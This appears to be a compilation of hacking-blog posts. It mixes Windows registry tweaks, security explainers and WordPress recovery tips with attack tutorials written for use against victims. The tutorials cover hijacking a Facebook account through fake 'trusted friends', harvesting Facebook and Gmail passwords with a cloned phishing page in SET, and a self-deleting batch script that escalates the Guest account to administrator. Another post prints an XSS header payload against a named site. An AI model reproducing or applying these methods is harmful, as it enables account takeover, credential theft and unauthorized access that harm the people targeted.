0 Hack Facebook Account || How to hack Facebook Account?

There are many techniques for Hack Facebook Account like Phishing Attacks, Keylogging ,Xss vulnerability ,cookie grabbing and other Social techniques but today we are going to see how to hack passwords using new feature introduced by Facebook the 3 Trusted Friends Password Recovery Feature in this what happens if you have lost your password and you don’t have any access to your default email address than this feature will handy by sending request to your 3 trusted friends and hence gaining your account password again.
For this technique you need to create 3 fake Facebook account and you need to surely add these as friends into your victims account whose account you are going to hack.girls fake account add by boys easily.Now follow the below steps .:

1. Go to Facebook and click Forgot your Password ?

2. Than you will get something like below just enter the details you know about him enter his Username, email address and full name.

3. After entering everything check it again and click on search.

 

4. After succeful search for the user Facebook will show some information about how many emails are linked to the account and there is simple option saying
No Longer Access to These click that one.

5. Now it will promote you to enter a new email address on which you will get the password resetting option so enter your email address I suggest you creating a Fake or Temporary email address for safety purpose.

6. Than it will promote you to enter the Security well if you have some security guess about that one than that’s ok but if you don’t know it than simply enter 3 wrong answers and it will take you to the 3 trusted friends recovery page like below.

7. Now just click continue and facebook will ask you to choose 3 trusted friends choose the 3 fake profiles of your which you created and added into the victims account.
8. After selecting 3 accounts facebook will send security codes to these accounts just enter these codes and you will get Password Resetting email from Facebook on the account you created in Step 5

That’s it now you are successful in Hacking Facebook Password with the 3 Trusted Friends Method.

Note: This trick only works if 3 trusted friends agree to give you the security code so its really important that you add your 3 fake accounts into your victims facebook account as a friend.

0 Finding Ip Address Of A Website Using Command Prompt Or CMD

In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.

How to find IP ?

1. Go to Start > Type CMD and press Enter.
2. Now write Ping followed by website URL whose IP you want to find.

3. It will take less then a second and come up with the results as shown below.

0 How To Open Banned Websites WIth Proxy Sites ?

There are many sites which are blocked by government because of breaking laws of their country. The user downloads many softwares to open these sites but end up being infected by  malware, virus. Today i will share a trick with you guys which can help you easily open these banned sites without downloading anything. As you know that there are many online proxies but everyone need a proxy server which is faster and trusted. Here in this post I am revealing an online proxy and a tutorial to open banned sites with the help of these online proxies which is trusted and fast. Just follow my step to open banned sites.

How To Open Banned Site ?

1. Open www.incloak.com in your browser.
You can also use any proxy site from list below2. After that enter the URL of the site which you want to open like below.

3. Now click the Hide Me button and enjoy.

0 6 Most Common Password Cracking Methods And Their Countermeasures

There are number of methods out their used by hackers to hack your account or get your personal information. Today in this post i will share with you guys 6 Most commonly used method to crack password and their countermeasures. You must check out this article to be safe and to prevent your online accounts from hacking.

1. BruteForce Attack

Any password can be cracked using Brute-force attack. Brute-force attacks try every possible combinations of numbers, letters and special characters until the right password is match. Brute-force attacks can take very long time depending upon the complexity of the password. The cracking time is determined by the speed of computer and complexity of the password.

Countermeasure: Use long and complex passwords. Try to use combination of upper and lowercase letters along with numbers. Brute-force attack will take hundreds or even thousands of years to crack such complex and long passwords.

Example: Passwords like "iloveu" or "password" can be cracked easily whereas computer will take years to crack passwords like "aN34lL00"

2. Social Engineering

Social engineering is process of manipulating someone to trust you and get information from them. For example, if the hacker was trying to get the password of a co-workers or friends computer, he could call him pretending to be from the IT department and simply ask for his login details. Sometime hackers call the victim pretending to be from bank and ask for their credit cards details. Social Engineering can be used to get someone password, to get bank credentials or any personal information.

Countermeasure: If someone tries to get your personal or bank details ask them few questions. Make sure the person calling you is legit. Never ever give your credit card details on phone.

3. Rats And Keyloggers

In keylogging or RATing the hacker sends keylogger or rat to the victim. This allows hacker to monitor every thing victim do on his computer. Every keystroke is logged including passwords. Moreever hacker can even control the victims computer.

Countermeasure: Never login to your bank account from cyber cafe or someone else computer. If its important use on-screen or virtual keyboard while tying the login. Use latest anti-virus software and keep them updated. Check out below article to know more about Rats and Keyloggers.

4. Phishing

Phishing is the most easiest and popular hacking method used by hackers to get someone account details. In Phishing attack hacker send fake page of real website like facebook, gmail to victim. When someone login through that fake page his details is send to the hacker. This fake pages can be easily created and hosted on free web-hosting sites.

Countermeasure: Phishing attacks are very easy to avoid. The url of this phishing pages are different from the real one. For example URL of phishing page of facebook might look like facbbook.com (As you can see There are two "b"). Always make sure that websites url is correct. Check out below article to know more about phishing.

5. Rainbow Table

A Rainbow table is a huge pre-computed list of hashes for every possible combination of characters. A password hash is a password that has gone through a mathematical algorithm such as md5 and is transformed into something which is not recognizable. A hash is a one way encryption so once a password is hashed there is no way to get the original string from the hashed string. A very commonly used hashing algorithm to store passwords in website databases is MD5. It is almost similar to dictionary attack, the only difference is, in rainbow tables attack hashed characters are used as passwords whereas in dictionary attack normal characters are used as passwords. 

Example: ‘hello’ in md5 is 5d41402abc4b2a76b9719d911017c592 and zero length string ("") is d41d8cd98f00b204e9800998ecf8427e

Countermeasure: Make sure you choose password that is long and complex. Creating tables for long and complex password takes a very long time and a lot of resources

6. Guessing

This seems silly but this can easily help you to get someones password within seconds. If hacker knows you, he can use information he knows about you to guess your password. Hacker can also use combination of Social Engineering and Guessing to acquire your password.

Countermeasure: Don't use your name, surname, phone number or birthdate as your password. Try to avoid creating password that relates to you. Create complex and long password with combination of letters and numbers.

0 Make Bootable USB Pen Drive For 3 in 1 Windows

Make Bootable USB Pen Drive For Windows
Windows XP,Windows 7,And Windows 8
In this post, I will show you how to load the Windows installation in your USB flash drive and how to make it bootable just like the DVD from your .iso image

This Post Very Help Full Guy's Because Install Window With USB Is Many Time Faster Than DVD.

Every needed software inside this pack no need to download more software

Info:
Download this software
after download extract etc. files
and install software.
Enjoy

Download For Windows

Windows XP
Windows 7
Windows 8

Share this post on your Facebook Profile,Twitter and Google.

Thank you

0 Gray Hat Hacking The Ethical Hackers Complete Handbook 3rd Edition Free Download

Gray hat hacking 3rd edition Handbook includes the following topics.

1.Which are most important for beginners.
2.Introduction to Ethical Disclosure
3.Penetration Testing and Tools
4.Exploiting
5.Vulnerability Analysis Chapter 20
6.Malware Analysis

0 How To Hack Server On Linux "Linux Server Hacks" Complete Book Free Download

Linux Server Hacks is a collection of 100 industrial-strength hacks, supplying tips and tools that solve practical problems for Linux design administrators. Every hack can be read in just a few protocol but will save hours of searching for the advantage answer. Some of the hacks are subtle, dozens of them are non-obvious, and all of them demonstrate the power and springiness of a Linux system. You'll discovery hacks devoted to tuning the Linux pit to type your diagram run more efficiently, as well as using CVS or RCS to track the change to design files. You'll learn possibility direction to do backups, how to use plot monitoring tools to odor plot virtue and a mixtures of secure networking solutions. Linux Server Hacks also helps you manage large-scale Web installations jogging Apache, MySQL, and other open source tools that are typically sliver of a Linux system.

0 How to Hack Windows Administrator Password

This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.

Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called  Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.

• You do not need to know the old password to set a new one
• Will detect and offer to unlock locked or disabled out user accounts!
• There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.

The download link for both CD and floppy drives along with the complete instructions is given below

Offline NT Password & Reg Editor Download

It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.

Another simple way to reset non-administrator account passwords

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.

1. Open the command prompt (Start->Run->type cmd->Enter)

2. Now type net user and hit Enter

3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows

4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.

So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.

0 How to Change Windows XP Logon Screen background

You can put your favorite image or picture in the background of the logon screen by doing the following methods.

1. Click the Start button and select “Run”
2. In the “open” field, type regedit and click ok
3. In the registry editor, navigate to HKEY_USERS\.DEFAULT\CONTROL PANEL\DESKTOP and double-click the string “wallpaper”
4. Enter the full path and filename of the .bmp image that you want to use as background (the image must be in .bmp format)
5. Click “ok” and close the registry editor

Note: Should Restart the computer for changes.

If you want to see the background set in tiled effect with the bitmap then follow the below steps.

1. Click the Start button and select “Run”
2. In the “open” field, type regedit and click ok
3. change the string HKEY_USERS\.DEFAULT\CONTROL PANEL\DESKTOP\TILEWALLPAPER to “1″ instead of “0″
4. Click “ok” and close the registry editor

0 How to Change the Logon Screen on Windows 7

Some time back Will showed you how to customize Windows XP Login. Windows 7, on the other hand, has the ability to change the logon screen built into it. Well sort of, the functionality exists to make it easy for OEMs to include their custom branding, but nothing stops you to take advantage of it. In this article we shall first look into how you can change the logon screen manually and then we will point you towards some tools that make the job easier and add even more feature rich. So let’s get started.

Manually

Its is always nice to know how things work behind the scenes, what better way to do so then try them out yourself. To change the logon screen manually follow these steps:

1. Fire up registry editor (Win Key + R and then type regedit, hit enter)
2. Browse to

   HKLMSoftwareMicrosoftWindowsCurrentVersionAuthenticationLogonUIBackground

   , double click on key named OEMBackground and change its value to 1 (If you cannot find the path or the key go ahead and create it, remember OEMBackground is a Dword)


3. You just enabled the OEM Background functionality. Now browse to the folder

   %windir%system32oobeinfobackgrounds

   within Windows explorer. %windir% refers to your Windows install directory
   

   C:Windows

   in most systems. Again the folder path may not exist already, so you can go ahead and create required folders (info and backgrounds are generally not present)


4. Now put in any JPG file with size less than 256 kb in this folder and rename it to backgroundDefault.jpg. This file will be stretched to fit the screen, so you would want it to match the resolution of your screen so that image doesn’t look bad. You can something like smush.it or Photoshop’s Save as/Save for Web feature to reduce image size.

0 How to disable the Turn Off Computer button in windows XP

Click Start button and type regedit in Run option then press Enter for next.

Here locate the location to:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer

Here in right side panel, right click to create a new DWORD value with the name NoClose.

Now assign number 1 in value data box and close the registry editor.

Now close the registry editor and restart your computer after any changes to go into effect.

0 DNS Hijacking: What it is and How it Works

DNS hijacking (sometimes referred to as DNS redirection) is a type of malicious attack that overrides a computer’s TCP/IP settings to point it at a rogue DNS server, thereby invalidating the default DNS settings. In other words, when an attacker takes control of a computer to alter its DNS settings so that it now points to a rogue DNS server, the process is referred to as DNS hijacking.

As we all know, the “Domain Name System (DNS)” is mainly responsible for translating a user friendly domain name such as “google.com” to its corresponding IP address “74.125.235.46″. Having a clear idea of DNS and its working can help you better understand what DNS hijacking is all about. If you are fairly new to the concept of DNS, I would recommend reading my previous post on How Domain Name System Works.

How DNS Hijacking Works?

As mentioned before, DNS is the one that is responsible for mapping the user friendly domain names to their corresponding IP addresses. This DNS server is owned and maintained by your Internet service provider (ISP) and many other private business organizations. By default, your computer is configured to use the DNS server from the ISP. In some cases, your computer may even be using the DNS services of other reputed organizations such as Google. In this case, you are said to be safe and everything seems to work normally.

But, imagine a situation where a hacker or a malware program gains unauthorized access to your computer and changes the DNS settings, so that your computer now uses one of the rogue DNS servers that is owned and maintained by the hacker. When this happens, the rogue DNS server may translate domain names of desirable websites (such as banks, search engines, social networking sites etc.) to IP addresses of malicious websites. As a result, when you type the URL of a website in the address bar, you may be taken to a fake website instead of the one you are intending for. Sometimes, this can put you in deep trouble!

What are the Dangers of DNS Hijacking?

The dangers of DNS hijacking can vary and depend on the intention behind the attack. Many ISPs such as “OpenDNS” and “Comcast” use DNS hijacking for introducing advertisements or collecting statistics. Even though this can cause no serious damage to the users, it is considered as a violation of RFC standards for DNS responses.

Other dangers of DNS hijacking include the following attacks:

Pharming: This is a kind of attack where a website’s traffic is redirected to another website that is a fake one. For example, when a user tries to visit a social networking website such as Facebook.com he may be redirected to another website that is filled with pop-ups and advertisements. This is often done by hackers in order to generate advertising revenue.

Phishing: This is a kind of attack where users are redirected to a malicious website whose design (look and feel) matches exactly with that of the original one. For example, when a user tries to log in to his bank account, he may be redirected to a malicious website that steals his login details.

How to Prevent DNS Hijacking?

In most cases, attackers make use of malware programs such as a trojan horse to carry out DNS hijacking. These DNS hacking trojans are often distributed as video and audio codecs, video downloaders, YoTube downloaders or as other free utilities. So, in order to stay protected, it is recommended to stay away from untrusted websites that offer free downloads. The DNSChanger trojan is an example of one such malware that hijacked the DNS settings of over 4 million computers to drive a profit of about 14 million USD through fraudulent advertising revenue.

Also, it is necessary to change the default password of your router so that it would not be possible for the attacker to modify your router settings using the default password that came with the factory setting. For more details on this topic you can read my other post on How to hack an Ethernet ADSL Router.

Installing a good antivirus program and keeping it up-to-date can offer a great deal of protection to your computer against any such attacks.

What if you are already a victim of DNS hijacking?

If you suspect that your computer is infected with a malware program such as DNSChanger, you need not panic. It is fairly simple and easy to recover from the damage caused by such programs. All you have to do is, just verify your current DNS settings to make sure that you are not using any of those DNS IPs that are blacklisted. Otherwise re-configure your DNS settings as per the guidelines of your ISP.

0 What is HTTP Header Injection Vulnerability

HTTP Header

HTTP Header is the component of HTTP requests and responces. Header fields are transimitted with each request and responce and carry additional data about the requests and responces.

See the typical request and responce headers Here at Web-Sniffer.net

HTTP header injection

HTTP header injection is a kind of web application vulnerability which exists on those web applications that generatd HTTP headers based on the input given by users. If it uses User based input in the headers, it can be used for HTTP response splitting, cross-site scripting (XSS), Session fixation via the Set-Cookie header, and malicious redirects attacks via the location header.

I recently found a similar kind of vulnerability in http://canadaedu.apple.com and for this I was also acknowledged by Apple on its website.

It used apache 1.3.33 that was vulnerable to the HTML and malicious javascript injection through  "Expect" header.

See the responce header of the website:

GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: canadaedu.apple.com
Cookie: PHPSESSID=3b8026225d719c6945155129c5c7335d
Connection: Close
Expect: <script>alert(411731119275)</script>
Pragma: no-cache

The alert box added in the Expect field could be injected for Cross Site Scripting.

0 How To Recover Your Hacked WordPress Website In Easy Steps?

WordPress is one of the most popular content management systems at present. However as a general law, the increasing popularity comes with a number of dangerous has gained attention of bad boys as well. There are so many people who are reporting the cases of hacked WordPress account on a regular basis. So I have thought of putting a complete guide to discuss how to recover your hacked WordPress.

Ways To Recover Hacked Account

Below is the perfect path to follow to get your hacked account back:

Backup – Even if your website is infected to a small extent, it is still very much necessary to secure the backup for your website before waiting for watching the things turning into worst. Don’t forget to take backup of your entire database and all files. You can also try for a faster solution by using BackupBuddy.

Change Login Details and Secret Access Keys – At the time you sense the hacking attempt, just try to login to your account to check whether your login details are still effective or not. If the username and password details are not yet changed then immediately change all the WordPress secret access keys in wp-config.php file and of-course your username and password.

Running Scanners – Running a scanner is also a very helpful step and comes at number 3 in this list. The scanners are basically used for identifying the compromises at the level of database. You can try out Cloud Sites WP Scanner plug-in or Sucuri Malware Scanner. After running the scanner you should make sure to move the next step stated below.

Installing Your WordPress Again – Next important step involves Deleting all the files existing in the directory of WordPress except wp-config.php file and wp-content directory. After that you need to download and install a totally fresh copy of WordPress. Now edit the wp-config-sample.php file by substituting the sample values by picking the actual database values from the wp-config.php file that you haven’t deleted as stated above. Now you can delete the present file and replace it with your own file.

Review Content Folder – Next task involved to check all the folders to find ones with any suspicious activity in your wp-content directory. So carefully analyze the folders content and remove any one that seems not to be belonging to you. If you later find that the folder was actually needed then you can get it back from your backup.

Analyze and Re-install Your Plug-ins – The next steps after completing with reviewing the folders’ content includes reviewing the plug-ins. Collect information about what plug-ins you are not using currently and uninstall them all for the time being. Now coming to all other activated plug-ins that you are using currently, deactivate and delete these plug-ins and then re-install and activate the active plug-ins.

Analyze Your Themes – Now the next thing that should be taken care of is the task of removing the extra themes which are not in use currently. Next task again involves reviewing your activated theme. Look through the PHP or Javascript code to find out any suspicious activity there. Most of the time hackers make such malicious changes in header.php or footer.php files.

Following this step by step guide can really help you a lot in getting your WordPress back. Also always remember to keep checking for the activities on your WordPress site. Also make it a habit to keep a time by time backup of your database. For more recovery details you can check on http://codex.wordpress.org/FAQ_My_site_was_hacked.

How to Secure before Getting hacked !

Every one is looking to make their blog looks secure and try to make their blog safe from hackers so that hackers can not take any kind of information from your blog. You can protect and increase security of your by doing following things :-

Chap Secure plugin

You can increase the security of your log-in by using Chap secure plugin, It helps in encrypting passwords by using CHAP protocol. It will help hacker to get in trouble.

Login Lockdown Plugin

This plugin helps a lot in stopping a hacker because if he is trying to play with your login screen then this plugin will limit hit after few wrong attempts.Just download the plugin and activate it. This plugin helps to secure your blog from newbie hackers. 

WP Security Scan

This plugin helps to check all the codes of your website from hacking Malware and scripts. It can find out which code or which file has virus in the blog.

Updating WordPress regularly

Try to upgrade the WordPress regularly as soon as any new version is launched. Most of the bloggers do not update WordPress and chances are huge that old WordPress version can get hacked.

Tac Theme Checker

You can install a plugin “Tac Theme checker” which can check your theme before activating it. It helps you to check the complete theme when you upload it into Dashboard and it helps to check the files completely in few seconds.

Make your security Bullet proof

You should increase your security more and more by adding some official steps from WordPress website and you can read them here http://codex.wordpress.org/Hardening_WordPress.

Theme of your Blog

Your theme plays an important part in hacking, If you are using some cracked version of theme then be ready to get hacked soon. Cracked themes often have codes which helps to get you hacked. I would suggest that get a proper theme from any web design company so that there is no chance to get hacked due to unethical themes.

I hope these steps will help you to protect from all the hack attempts. If you have any other method then do let us know in below comments. Thank you

0 Computer Hack Administrator from Guest

Hack Administrator Account from Guest Account.Yes!! that is quite possible.All you need to do is to follow the below procedure.


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...

-----------------------------------------

ADMINISTRATOR IN WELCOME SCREEN.


When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.



EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Enjoy

0 Hack facebook account and Gmail account using Backtrack 5

Now in this tutorial I am going to show you how to hack facebook account using backtrack 5. So just follow the simple steps.
Open your backtrack 5’s terminal and type cd /pentest/exploits/set
Backtrack5 1

Now Open social Engineering Tool kit (SET) ./set

Just hit ENTER and SET will Open , Now just select 1st option (1 Social-Engineering Attacks) and hit enter after that 2nd number (just type 2 as shown in snapshot)

Now Just select 4th Option “Tabnabbing Attack Method” and Hit ENTER

Then select 2nd option “Site Cloner” and Hit ENTER

Now here you need to add the URL of Facebook (if you want to hack gmail then just add the gmail’s URL)

Now just hit the enter.

Open new terminal and just type ifconfig and hit ENTER

Now just copy this IP address and open it in Browser.

Now here I am just typing test email and password to see whether it works or not.

Now just hit enter and switch back to our terminal and we found the Email and password !